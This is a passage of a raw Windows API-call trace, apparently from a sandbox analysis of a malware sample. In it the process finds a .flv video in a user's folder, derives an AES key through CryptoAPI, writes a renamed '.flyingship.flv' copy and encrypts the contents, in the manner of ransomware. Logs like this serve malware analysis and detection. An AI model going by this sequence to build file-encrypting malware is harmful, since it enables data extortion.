lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.061] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.061] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.061] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.061] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.061] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.062] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7a5ae0, ftCreationTime.dwHighDateTime=0x1d5e65e, ftLastAccessTime.dwLowDateTime=0x1d6f670, ftLastAccessTime.dwHighDateTime=0x1d5dfb4, ftLastWriteTime.dwLowDateTime=0x1d6f670, ftLastWriteTime.dwHighDateTime=0x1d5dfb4, nFileSizeHigh=0x0, nFileSizeLow=0xb964, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="0vlShOAoYV07RlGs7cfh.flv", cAlternateFileName="0VLSHO~1.FLV")) returned 0x90af58 [0197.062] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0197.062] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.062] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.062] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.062] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0197.062] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.062] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0197.062] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.062] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.062] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0197.062] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.063] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0197.064] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0197.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.064] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0197.064] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.084] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.084] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0197.084] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0197.084] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.084] CryptHashData (hHash=0x90ae18, pbData=0x8ded08, dwDataLen=0x19, dwFlags=0x1) returned 1 [0197.084] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.084] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.084] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0197.085] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.085] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.085] CryptDestroyHash (hHash=0x90ae18) returned 1 [0197.085] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\0vlshoaoyv07rlgs7cfh.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0197.086] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.086] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0197.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0197.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0197.086] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0197.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0197.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0197.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0197.086] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.087] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flyingship.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\0vlshoaoyv07rlgs7cfh.flyingship.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0197.087] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0197.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0197.088] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0197.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0197.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0197.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0197.088] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.088] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0197.088] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xb964, lpOverlapped=0x0) returned 1 [0197.090] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0197.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0197.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.090] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0197.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0197.090] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb964) returned 0xbea018 [0197.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0197.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0197.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0197.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0197.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0197.091] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb964) returned 0xbf5988 [0197.091] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0197.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.092] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0197.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0197.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0197.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0197.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0197.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb964) returned 0xbea018 [0197.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0197.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0197.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0197.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0197.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0197.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.092] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0197.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0197.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0197.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0197.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0197.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0197.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0197.092] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0197.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0197.092] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0197.092] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0197.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0197.092] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb964) returned 0xbea018 [0197.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27a8 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0197.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27d8 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0197.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0197.093] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0197.093] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb964) returned 0xc012f8 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0197.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0197.094] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0197.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0197.094] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0197.094] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0197.095] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0197.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0197.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0197.095] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0197.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0197.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26e8 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0197.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0197.095] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0197.095] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0197.096] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0197.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0197.096] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0197.096] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0197.096] RtlAllocateHeap (HeapHandle=0x8a0000, 